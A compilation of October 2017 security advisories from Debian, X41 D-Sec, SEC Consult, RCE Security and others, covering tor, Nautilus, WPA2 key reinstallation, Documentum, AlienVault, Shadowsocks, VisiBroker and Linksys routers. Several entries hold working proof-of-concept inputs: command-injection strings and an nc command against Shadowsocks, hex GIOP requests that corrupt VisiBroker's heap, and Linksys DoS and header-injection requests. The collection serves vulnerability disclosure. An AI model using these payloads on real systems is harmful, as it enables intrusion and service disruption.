[SECURITY] [DSA 3993-1] tor security update

- ------------------------------------------------------------------------- Debian Security Advisory DSA-3993-1 security@debian.org https://www.debian.org/security/ Moritz Muehlenhoff October 06, 2017 https://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : tor CVE ID : CVE-2017-0380 It was discovered that the Tor onion service could leak sensitive information to log files if the "SafeLogging" option is set to "0". The oldstable distribution (jessie) is not affected. For the stable distribution (stretch), this problem has been fixed in version 0.2.9.12-1. We recommend that you upgrade your tor packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

[SECURITY] [DSA 3994-1] nautilus security update

Debian Security Advisory DSA-3994-1 security@debian.org https://www.debian.org/security/ Yves-Alexis Perez October 07, 2017 https://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : nautilus CVE ID : CVE-2017-14604 Debian Bug : 860268 Christian Boxdörfer discovered a vulnerability in the handling of FreeDesktop.org .desktop files in Nautilus, a file manager for the GNOME desktop environment. An attacker can craft a .desktop file intended to run malicious commands but displayed as a innocuous document file in Nautilus. An user would then trust it and open the file, and Nautilus would in turn execute the malicious content. Nautilus protection of only trusting .desktop files with executable permission can be bypassed by shipping the .desktop file inside a tarball. For the oldstable distribution (jessie), this problem has not been fixed yet. For the stable distribution (stretch), this problem has been fixed in version 3.22.3-1+deb9u1. For the testing distribution (buster), this problem has been fixed in version 3.26.0-1. For the unstable distribution (sid), this problem has been fixed in version 3.26.0-1. We recommend that you upgrade your nautilus packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

[SECURITY] [DSA 3995-1] libxfont security update

- ------------------------------------------------------------------------- Debian Security Advisory DSA-3995-1 security@debian.org https://www.debian.org/security/ Moritz Muehlenhoff October 10, 2017 https://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : libxfont CVE ID : CVE-2017-13720 CVE-2017-13722 Two vulnerabilities were found in libXfont, the X11 font rasterisation library, which could result in denial of service or memory disclosure. For the oldstable distribution (jessie), these problems have been fixed in version 1:1.5.1-1+deb8u1. For the stable distribution (stretch), these problems have been fixed in version 1:2.0.1-3+deb9u1. We recommend that you upgrade your libxfont packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Multiple vulnerabilities in OpenText Documentum Content Server

CVE Identifier: CVE-2017-15012 Vendor: OpenText Affected products: OpenText Documentum Content Server (all versions) Researcher: Andrey B. Panfilov CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) Fix: not available Description: Opentext Documentum Content Server (formerly known as EMC Documentum Content Server) does not properly validate input of PUT_FILE RPC-command which allows any authenticated user to hijack arbitrary file from Content Server filesystem, because some files on Content Server filesystem are security-sensitive this security flaw leads to privilege escalation CVE Identifier: CVE-2017-15013 Vendor: OpenText Affected products: OpenText Documentum Content Server (all versions) Researcher: Andrey B. Panfilov CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) Fix: not available Description: Opentext Documentum Content Server (formerly known as EMC Documentum Content Server) contains following design gap, which allows authenticated user to gain privileges of superuser: Content Server stores information about uploaded files in dmr_content objects, which are queryable and "editable" (before release 7.2P02 any authenticated user was able to edit dmr_content objects, now any authenticated user may delete dmr_content object and them create new one with the old identifier) by authenticated users, this allows any authenticated user to replace content of security-sensitive dmr_content objects (for example, dmr_content related to dm_method objects) and gain superuser privileges CVE Identifier: CVE-2017-15014 Vendor: OpenText Affected products: OpenText Documentum Content Server (all versions) Researcher: Andrey B. Panfilov CVSS v3 Base Score: 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) Fix: not available Description: Opentext Documentum Content Server (formerly known as EMC Documentum Content Server) contains following design gap, which allows authenticated user to download arbitrary content files regardless attacker's repository permissions: when authenticated user upload content to repository he performs following steps: - calls START_PUSH RPC-command - uploads file to content server - calls END_PUSH_V2 RPC-command, here Content Server returns DATA_TICKET (integer), purposed to identify the location of the uploaded file on Content Server filesystem - further user creates dmr_content object in repository, which has value of data_ticket equal to the value of DATA_TICKET received at the end of END_PUSH_V2 call As the result of such design any authenticated user may create his own dmr_content object, pointing to already existing content of Content Server filesystem CVE Identifier: CVE-2017-15276 Vendor: OpenText Affected products: OpenText Documentum Content Server (all versions) Researcher: Andrey B. Panfilov CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) Fix: not available Description: Opentext Documentum Content Server (formerly known as EMC Documentum Content Server) contains following design gap, which allows authenticated user to gain privileges of superuser: Content Server allows to upload content using batches (TAR archives), when unpacking TAR archives Content Server fails to verify contents of TAR archive which causes path traversal vulnerability via symlinks, because some files on Content Server filesystem are security-sensitive this security flaw leads to privilege escalation

[RCESEC-2017-002][CVE-2017-14956] AlienVault USM v5.4.2 "/ossim/report/wizard_email.php" Cross-Site Request Forgery leading to Sensitive Information Disclosure

RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: AlienVault USM Vendor URL: https://www.alienvault.com Type: Cross-Site Request Forgery [CWE-253] Date found: 2017-09-22 Date published: 2017-10-13 CVSSv3 Score: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N) CVE: CVE-2017-14956 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== AlienVault USM 5.4.2 (current) older versions may be affected too. 4. INTRODUCTION =============== AlienVault Unified Security Management (USM) is a comprehensive approach to security monitoring, delivered in a unified platform. The USM platform includes five essential security capabilities that provide resource-constrained organizations with all the security essentials needed for effective threat detection, incident response, and compliance, in a single pane of glass. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== AlienVault USM v5.4.2 offers authenticated users the functionality to generate and afterwards export generated compliance reports via the script located at "/ossim/report/wizard_email.php". Besides offering an export via a local file download, the script does also offer the possibility to send out any report via email to a given address (either in PDF or XLSX format). An exemplary request to send the pre-defined report "PCI_DSS_3_2__Vulnerability_Details" to the email address "email@example.com" looks like the following: https://example.com/ossim/report/wizard_email.php?extra_data=1&name=UENJX0RTU18zXzJfX1Z1bG5lcmFiaWxpdHlfRGV0YWlscw==&format=email&pdf=true&email=email@example.com The base64-encoded HTTP GET "name" parameter can be replaced with any other of the approx. 240 pre-defined reports, that are shipped with AlienVault USM since they do all have hardcoded identifiers, such as: - Alarm_Report - Ticket_Report - Business_and_Compliance - HIPAA_List_of_identified_ePHI_assets - PCI_DSS_3_2_Database_Users_Added - VulnerabilitiesReport etc. Since there is no anti-CSRF token protecting this functionality, it is vulnerable to Cross-Site Request Forgery attacks. An exemplary exploit to send the "PCI_DSS_3_2__Vulnerability_Details" report as a PDF-file to "email@example.com" could look like the following:

6. RISK ======= To successfully exploit this vulnerability a user with rights to access the compliance reports must be tricked into visiting an arbitrary website while having an authenticated session in the application. The vulnerability allows remote attackers to trigger a report generation and send the report out to an arbitrary email address, which may lead to the disclosure of very sensitive internal reporting information stored in AlienVault USM through pre-defined reports such as: - Alarms - Assets Inventory - Compliance Reports such as PCI DSS and HIPAA - Raw Logs - Security Events - Security Operations - Tickets - User Activity 7. SOLUTION =========== None. 8. REPORT TIMELINE ================== 2017-09-22: Discovery of the vulnerability 2017-09-22: Sent full vulnerability details to publicly listed security email address 2016-10-01: MITRE assigns CVE-2017-14956 2017-10-03: No response from vendor, notified vendor again 2017-10-13: No response from vendor 2017-10-13: Public disclosure according to disclosure policy 9. REFERENCES ============= https://www.rcesecurity.com/2017/10/cve-2017-14956-alienvault-usm-leaks-sensitive-compliance-information-via-csrf https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14956

Advisory X41-2017-008: Multiple Vulnerabilities in Shadowsocks

X41 D-Sec GmbH Security Advisory: X41-2017-008 Multiple Vulnerabilities in Shadowsocks ======================================= Overview -------- Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6 Confirmed Patched Versions: N/A Vendor: Shadowsocks Vendor URL: https://github.com/shadowsocks/shadowsocks/tree/master Vector: Network Credit: X41 D-Sec GmbH, Niklas Abel Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-008-shadowsocks/ Summary and Impact ------------------ Several issues have been identified, which allow attackers to manipulate log files, execute commands and to brute force Shadowsocks with enabled autoban.py brute force detection. Brute force detection from autoban.py does not work with suggested tail command. The key of captured Shadowsocks traffic can be brute forced. Product Description ------------------- Shadowsocks is a fast tunnel proxy that helps you bypass firewalls. Log file manipulation ===================== Severity Rating: Medium Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6 Confirmed Patched Versions: N/A Vector: Network CVE: not yet issued CWE: 117 CVSS Score: 4.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N Summary and Impact ------------------ Log file manipulation is possible with a manipulated hostname, sent to the server from a client, even if Shadowsocks is as quiet as possible with "-qq". Therefore a string like "\nI could be any log entry\n" could be sent as hostname to Shadowsocks. The server would log an additional line with "I could be any log entry". Workarounds ----------- There is no workaround available, do not trust the logfiles until a patch is released. Command Execution ================= Severity Rating: Critical Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6 Confirmed Patched Versions: N/A Vector: Network CVE: not yet issued CWE: 78 CVSS Score: 9.0 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H Summary and Impact ------------------ When the brute force detection with autoban.py is enabled, remote attackers are able to execute arbitrary commands. Command execution is possible because of because of line 53 "os.system(cmd)" in autoban.py, which executes "cmd = 'iptables -A INPUT -s %s -j DROP' % ip". The "ip" parameter gets parsed from the log file, whose contents can be controlled by a third party sending unauthenticated packets. Proof of Concept ---------------- When, a string like "can not parse header when ||ls&:\n" is sent as host name to Shadowsocks, it would end up in the logfile and lead to the execution of "ls". Autoban.py does not execute commands with spaces due to internal sanitization. A requested hostname like: " can not parse header when ||ls&:\ntouch /etc/evil.txt\nexit\ncan not parse header when ||/bin/bash log 2>log &" does not block IP's. The "for line in sys.stdin:" from autoban.py parses the input until there is an end of file (EOF). As "tail -F" will never pipe an EOF into the pyhon script, the sys.stdin will block the script forever. So the "tail -F /var/log/shodowsocks | autoban.py" will never block anything except itself. Workarounds ----------- Use python "autoban.py < /var/log/shadowsocks.log" in a cronjob. Do not use autoban.py until the command execution issue gets fixed. Bruteforcable Shadowsocks traffic because of MD5 ================================================ Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6 Confirmed Patched Versions: N/A Summary and Impact ------------------ Shadowsocks uses no brute force prevention for it's key derivation function. The key for Shadowsocks traffic encryption is static and derived from the password, using MD5. The password derivation is in encrypt.py in line 56 to 63: " while len(b''.join(m)) < (key_len + iv_len): md5 = hashlib.md5() data = password if i > 0: data = m[i - 1] + password md5.update(data) m.append(md5.digest()) i += 1 " MD5 should not be used to generate keys, since it is a hash function. A proper key derivation function increases the costs for this operation, which is a small burden for a user, but a big one for an attacker, which performs this operation many more times. As passwords usually have low-entropy, a good password derivation function has to be slow. Workarounds ----------- Use a secure password generated by a cryptographically secure random generator. Wait for a patch that uses a password based key derivation function like "Argon2" instead of a hash. About X41 D-Sec GmbH -------------------- X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline -------- 2017-09-28 Issues found 2017-10-05 Vendor contacted 2017-10-09 Vendor contacted, replied to use GitHub for a full disclosure 2017-10-11 Vendor contacted, asked if the vendor is sure to want a full disclosure 2017-10-12 Vendor contacted, replied to create a public issue on GitHub 2017-10-13 Created public issues on GitHub 2017-10-13 Advisory release

Advisory X41-2017-010: Command Execution in Shadowsocks-libev

X41 D-Sec GmbH Security Advisory: X41-2017-010 Command Execution in Shadowsocks-libev ====================================== Overview -------- Severity Rating: High Confirmed Affected Versions: 3.1.0 Confirmed Patched Versions: N/A Vendor: Shadowsocks Vendor URL: https://github.com/shadowsocks/shadowsocks-libev Vector: Local Credit: X41 D-Sec GmbH, Niklas Abel Status: Public CVE: not yet assigned Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-010-shadowsocks-libev/ Summary and Impact ------------------ Shadowsocks-libev offers local command execution per configuration file or/and additionally, code execution per UDP request on 127.0.0.1. The configuration file on the file system or the JSON configuration received via UDP request is parsed and the arguments are passed to the "add_server" function. The function calls "construct_command_line(manager, server);" which returns a string from the parsed configuration. The string gets executed at line 486 "if (system(cmd) == -1) {", so if a configuration parameter contains "||evil command&&" within the "method" parameter, the evil command will get executed. The ss-manager uses UDP port 8830 to get control commands on 127.0.0.1. By default no authentication is required, although a password can be set with the '-k' parameter. Product Description ------------------- Shadowsocks-libev is a lightweight secured SOCKS5 proxy for embedded devices and low-end boxes. The ss-manager is meant to control Shadowsocks servers for multiple users, it spawns new servers if needed. It is a port of Shadowsocks created by @clowwindy, and maintained by @madeye and @linusyang. Proof of Concept ---------------- As passed configuration requests are getting executed, the following command will create file "evil" in /tmp/ on the server: nc -u 127.0.0.1 8839 add: {"server_port":8003, "password":"test", "method":"||touch /tmp/evil||"} The code is executed through shadowsocks-libev/src/manager.c. If the configuration file on the file system is manipulated, the code would get executed as soon as a Shadowsocks instance is started from ss-manage, as long as the malicious part of the configuration has not been overwritten. Workarounds ----------- There is no workaround available, do not use ss-manage until a patch is released. About X41 D-Sec GmbH -------------------- X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions. Timeline -------- 2017-09-28 Issues found 2017-10-05 Vendor contacted 2017-10-09 Vendor contacted, replied to use GitHub for a full disclosure 2017-10-11 Vendor contacted, asked if the vendor is sure to want a full disclosure 2017-10-12 Vendor contacted, replied to create a public issue on GitHub 2017-10-13 Created public issue on GitHub 2017-10-13 Advisory release

SEC Consult SA-20171016-0 :: Multiple vulnerabilities in Micro Focus VisiBroker C++

SEC Consult Vulnerability Lab Security Advisory < 20171016-0 > ======================================================================= title: Multiple vulnerabilities product: Micro Focus VisiBroker C++ vulnerable version: 8.5 SP2 fixed version: 8.5 SP4 HF3 CVE number: CVE-2017-9281, CVE-2017-9282, CVE-2017-9283 impact: High homepage: https://www.microfocus.com/products/corba/visibroker/ found: 2017-04 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "VisiBroker(TM) is a comprehensive CORBA environment for developing, deploying, and managing distributed applications. Built on open industry standards and a high-performance architecture, VisiBroker is especially suited to low-latency, complex, data-oriented, transaction-intensive, mission-critical environments. Using VisiBroker(R), organizations can develop, connect, and deploy complex distributed applications that have to meet very high performance and reliability standards. With more than 30 million licenses in use, VisiBroker is the world’s most widely deployed CORBA Object Request Broker (ORB) infrastructure." URL: https://www.microfocus.com/products/corba/visibroker/ Business recommendation: ------------------------ During a superficial fuzzing test, SEC Consult found several memory corruption vulnerabilities that allow denial of service attacks or potentially arbitrary code execution. Although the fuzzing test only had a very limited coverage, several vulnerabilities have been identified. Assuming the code quality is homogenous, it is possible that other parts of the application exhibit similar issues. SEC Consult did not attempt to fully evaluate the potential impact of the identified vulnerabilities. SEC Consult recommends to decommission any VisiBroker C++ component that communicates with untrusted entities until a full security audit has been performed. Moreover, SEC Consult recommends to restrict network access to all CORBA services that utilize the VisiBroker C++ environment. Vulnerability overview/description: ----------------------------------- 1) Integer Overflow / Out of Bounds Read (Denial of Service) [CVE-2017-9281] By specifying a large value for a length field, an integer overflow occurs. As a result, the application reads memory until a non-mapped memory region is reached. This causes the application to encounter a segmentation fault. 2) Integer Overflow (Heap Overwrite) [CVE-2017-9282] By specifying a manipulated value for a length field an attacker can cause an integer overflow. This causes the application to allocate too little memory. When the application attempts to write to this memory buffer, heap memory is overwritten leading to denial of service or potentially arbitrary code execution. 3) Out of Bounds Read [CVE-2017-9283] By specifying a manipulated value for a length field, an attacker can cause the application to read past an allocated memory region. 4) Use after Free SEC Consult found that the application under certain circumstances tries to access a memory region that has been deallocated before. It is unclear whether Micro Focus fixed the root cause of this behaviour. As the vendor was unable to reproduce the vulnerability in the current version, Micro Focus believes that the vulnerability was fixed with a previous update. Since SEC Consult is unsure whether Micro Focus found the root cause of the vulnerability, we refrain from releasing proof of concept code. Proof of concept: ----------------- A service implementing the following IDL was used to identify the vulnerabilities listed here: module Bank { interface Account { float balance(in string test); }; interface AccountManager { Account open(in string name); }; }; The implemented service was based on the Visibroker example project "bank_agent". 1) Integer Overflow / Out of Bounds Read (Denial of Service) The method CORBA_MarshalOutBuffer *__cdecl CORBA_MarshalOutBuffer::put( CORBA_MarshalOutBuffer *this, const char *src, unsigned int size) is used to copy/append a char[] into a buffer. If the size of the data that is stored in the buffer plus the size of the char[] to be appended exceeds the allocated size, the method reallocates the buffer. By choosing the size of the char[] as e.g. 0xffffffff (on 32 bit systems) an integer overflow can be caused. The method then continues without allocating additional memory. However, the application then expects that the source buffer contains 0xffffffff bytes of memory. Since this would exceed the available process memory on 32 bit systems, the application's attempt to copy data to the destination buffer fails with an out of bounds read. The following binary request demonstrates this issue for the IDL above: 47494f5001020000000000860000000203000000000000000000002b00504d430000000400000010 2f62616e6b5f6167656e745f706f610000ffffff42616e6b4d616e6167657200000000056f70656e 0000000000000002000000010000000c000000000001000100010109564953060000000500070801 83000000000000000000000e4a61636b20422e20517569636b00 2) Integer Overflow (Heap Overwrite) The method int __cdecl CORBA::string_alloc(unsigned int size) is used to allocate buffers for strings. Since it allocates size + 1 bytes of heap memory, specifying 0xffffffff causes an integer overflow leading to the allocation of 0 bytes. This causes heap memory to be overwritten. SEC Consult was able to use the following request to cause corruption of heap structures: 47494f5001020000000000860000000203000000000000000000002b00504d430000000400000010 2f62616e6b5f6167656e745f706f61000000000b42616e6b4d616e6167657200000000056f70656e 0000000000000002000000010000000c000000000001000100010109564953060000000500070801 8300000000000000ffffffff4a61636b20422e20517569636b00 3) Out of Bounds Read The constructor int __cdecl VISServiceId::VISServiceId( VISServiceId *this, CORBA_MarshalInBuffer *a2, unsigned __int32 a3, unsigned __int8 *a4) parses the GIOP key address. The VisiBroker key address consists of two strings. Before each string, a long (32 bit) value specifies the length of the string. To calculate the offset of the second string, the size of the first string is used. If this value is chosen so that the offset of the second string is outside of the GIOP message, an out of bounds read occurs. The following binary request demonstrates this issue for the IDL above: 47494f5001020000000000860000000203000000000000000000002b00504d430000000480000000 2f62616e6b5f6167656e745f706f61000000000b42616e6b4d616e6167657200000000056f70656e 0000000000000002000000010000000c000000000001000100010109564953060000000500070801 83000000000000000000000e4a61636b20422e20517569636b00 4) Use after Free / Denial of Service Micro Focus did not clearly state that the root cause of the vulnerability has been fixed. As a precaution we refrain from releasing proof of concept code. Vulnerable / tested versions: ----------------------------- At least VisiBroker C++ 8.5 SP2 has been found to be vulnerable. According to the vendor VisiBroker 8.5 prior to SP4 HF3 are vulnerable to issues #1 - #3. Vendor contact timeline: ------------------------ 2017-05-03: Contacting vendor through security@microfocus.com, attaching encrypted security advisory 2017-05-03: Vendor: will inform us about the timeframe once the findings have been reproduced 2017-05-26: Vendor: were able to reproduce first 3 issues; requested further information for vulnerability #4 2017-05-30: Providing further information for vulnerability #4 2017-06-21: Requesting status update 2017-06-28: Vendor: First three issues have been fixed by the development team, "They have reproduced the fourth and are working on it now." 2017-06-30: Vendor: Patch will be available in a few weeks 2017-07-28: Requesting status update 2017-08-02: Vendor: There is no fixed release date for the patch yet 2017-08-28: Vendor: Initial test run found an issue that has been fixed 2017-09-15: Requesting status update 2017-09-15: Vendor: "The patches were just released on the 12th and 13th" 2017-09-18: Asking for further information about CVEs, affected versions 2017-09-21: Vendor: Issue #4 has not been fixed since the team was unable to reproduce it (the vendor stated that the issue has been reproduced, see 2017-06-26). "They [the team] believe it was already fixed by an earlier modification." 2017-09-27: Requesting clarification for issue #4 2017-09-27: Vendor: The team initially thought they had reproduced the issue; this was an unrelated issue that was fixed as well. 2017-10-16: Public release of the advisory; Solution: --------- Upgrade to version 8.5 Service Pack 4 Hotfix 3. The release notes with information on how to obtain this hotfix can be obtained here: https://community.microfocus.com/microfocus/corba/visibroker_-_world_class_middleware/w/knowledge_base/29171/visibroker-8-5-service-pack-4-hotfix-3-security-fixes Workaround: ----------- None Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF W. Ettlinger / @2017

[SECURITY] [DSA 3999-1] wpa security update

- ------------------------------------------------------------------------- Debian Security Advisory DSA-3999-1 security@debian.org https://www.debian.org/security/ Yves-Alexis Perez October 16, 2017 https://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : wpa CVE ID : CVE-2017-13077 CVE-2017-13078 CVE-2017-13079 CVE-2017-13080 CVE-2017-13081 CVE-2017-13082 CVE-2017-13086 CVE-2017-13087 CVE-2017-13088 Mathy Vanhoef of the imec-DistriNet research group of KU Leuven discovered multiple vulnerabilities in the WPA protocol, used for authentication in wireless networks. Those vulnerabilities applies to both the access point (implemented in hostapd) and the station (implemented in wpa_supplicant). An attacker exploiting the vulnerabilities could force the vulnerable system to reuse cryptographic session keys, enabling a range of cryptographic attacks against the ciphers used in WPA1 and WPA2. More information can be found in the researchers's paper, Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2. CVE-2017-13077: reinstallation of the pairwise key in the Four-way handshake CVE-2017-13078: reinstallation of the group key in the Four-way handshake CVE-2017-13079: reinstallation of the integrity group key in the Four-way handshake CVE-2017-13080: reinstallation of the group key in the Group Key handshake CVE-2017-13081: reinstallation of the integrity group key in the Group Key handshake CVE-2017-13082: accepting a retransmitted Fast BSS Transition Reassociation Request and reinstalling the pairwise key while processing it CVE-2017-13086: reinstallation of the Tunneled Direct-Link Setup (TDLS) PeerKey (TPK) key in the TDLS handshake CVE-2017-13087: reinstallation of the group key (GTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame CVE-2017-13088: reinstallation of the integrity group key (IGTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame For the oldstable distribution (jessie), these problems have been fixed in version 2.3-1+deb8u5. For the stable distribution (stretch), these problems have been fixed in version 2:2.4-1+deb9u1. For the testing distribution (buster), these problems have been fixed in version 2:2.4-1.1. For the unstable distribution (sid), these problems have been fixed in version 2:2.4-1.1. We recommend that you upgrade your wpa packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

SEC Consult SA-20171018-1 :: Multiple vulnerabilities in Linksys E-series products

SEC Consult Vulnerability Lab Security Advisory < 20171018-1 > ======================================================================= title: Multiple vulnerabilities product: Linksys E series, see "Vulnerable / tested versions" vulnerable version: see "Vulnerable / tested versions" fixed version: no public fix, see solution/timeline CVE number: - impact: high homepage: http://www.linksys.com/ found: 2017-06-26 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Today, Belkin International has three brands – Belkin, Linksys and WeMo – to enhance the technology that connects us to the people, activities and experiences we love. Belkin products are renowned for their simplicity and ease of use, while our Linksys brand helped make wireless connectivity mainstream around the globe. Our newest brand, WeMo, is the leader in delivering customizable smart home experiences. Its product platform empowers people to monitor, measure and manage their electronics, appliances and lighting at home and on-the-go." Source: http://www.belkin.com/uk/aboutUs/ Business recommendation: ------------------------ SEC Consult recommends not to use this product in a production environment until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: ----------------------------------- 1) Denial of Service (DoS) A denial of service vulnerability is present in the web server of the device. This vulnerability is very simple to trigger since a single GET request to a cgi-script is sufficient. A crafted GET request, e.g. triggered by CSRF over a user in the internal network, can reboot the whole device or freeze the web interface and the DHCP service. This action does not require authentication. 2) HTTP Header Injection & Open Redirect Due to a flaw in the web service a header injection can be triggered without authentication. This kind of vulnerability can be used to perform different arbitrary actions. One example in this case is an open redirection to another web site. In the worst case a session ID of an authenticated user can be stolen this way because the session ID is embedded into the url which is another flaw of the web service. 3) Improper Session-Protection The session ID for administrative users can be fetched from the device from LAN without credentials because of insecure session handling. This vulnerability can only be exploited when an administrator was authenticated to the device before the attack and opened a session previously. The login works if the attacker has the same IP address as the PC of the legitimate administrator. Therefore, a CSRF attack is possible when the administrator is lured to surf on a malicious web site or to click on a malicious link. 4) Cross-Site Request Forgery Vulnerability in Admin Interface A cross-site request forgery vulnerability can be triggered in the administrative interface. This vulnerability can be exploited because the session ID can be hijacked by using 3) via LAN. An exploitation via internet is only possible if the session id is exposed to the internet (for example via the referrer). An attacker can change any configuration of the device by luring a user to click on a malicious link or surf to a malicious web-site. 5) Cross-Site Scripting Vulnerability in Admin Interface A cross-site scripting vulnerability can be triggered in the administrative interface. This vulnerability can be exploited because the session ID can be hijacked by using 3) via LAN. An exploitation via internet is only possible if the session id is exposed to the internet (for example via the referrer). By using this vulnerability, malicious code can be executed in the context of the browser session of the attacked user. Proof of concept: ----------------- 1) Denial of Service Unauthenticated request for triggering a router reboot in browser: http:///upgrade.cgi http:///restore.cgi Unauthenticated request for triggering a router freeze in browser: http:///mfgtst.cgi 2) HTTP Header Injection & Open Redirect A header injection can be triggered by the following unauthenticated request: Request: ------------------------------------------------------------------------------ POST /UnsecuredEnable.cgi HTTP/1.1 Host: Accept: */* Accept-Language: en Connection: close Referer: http:///Unsecured.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 97 submit_type=&submit_button=UnsecuredEnable&gui_action=Apply&wait_time=19&next_url=INJEC%0d%0aTION&change_action= ------------------------------------------------------------------------------ Response: ------------------------------------------------------------------------------ HTTP/1.1 302 Redirect Server: httpd Date: Thu, 01 Jan 1970 00:27:41 GMT Location: http://INJEC TION Content-Type: text/plain Connection: close ------------------------------------------------------------------------------ Setting a new location will result in an open redirect: Request: ------------------------------------------------------------------------------ POST /UnsecuredEnable.cgi HTTP/1.1 Host: Accept: */* Accept-Language: en Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 97 submit_type=&submit_button=UnsecuredEnable&gui_action=Apply&wait_time=19&next_url=www.sec-consult.com&change_action= ------------------------------------------------------------------------------ Response: ------------------------------------------------------------------------------ HTTP/1.1 302 Redirect Server: httpd Date: Thu, 01 Jan 1970 00:27:57 GMT Location: http://www.sec-consult.com Content-Type: text/plain Connection: close ------------------------------------------------------------------------------ 3) Improper Session-Protection These two requests can be used to fetch the current session ID of an authenticated user. http:///BlockTime.asp http:///BlockSite.asp The response is nearly the same (except the "inetblock" and "blocksite" functions): ------------------------------------------------------------------------------- HTTP/1.1 200 Ok Server: httpd Date: Thu, 01 Jan 1970 00:04:32 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html [...] function init() { var close_session = "0"; if ( close_session == "1" ) { document.forms[0].action= "hndUnblock.cgi"; } else { document.forms[0].action= "hndUnblock.cgi?session_id="; } }

[...] ------------------------------------------------------------------------------- 4) Cross-Site Request Forgery Vulnerability in Admin Interface The following proof of concept HTML code can change the router password by exploiting CSRF after replacing the with the fetched one from 3). The new password is "secconsult". -------------------------------------------------------------------------------

------------------------------------------------------------------------------- 5) Cross-Site Scripting Vulnerability in Admin Interface The must be replaced again. The "apply.cgi" script can be abused to trigger the cross-site scripting vulnerability. -------------------------------------------------------------------------------

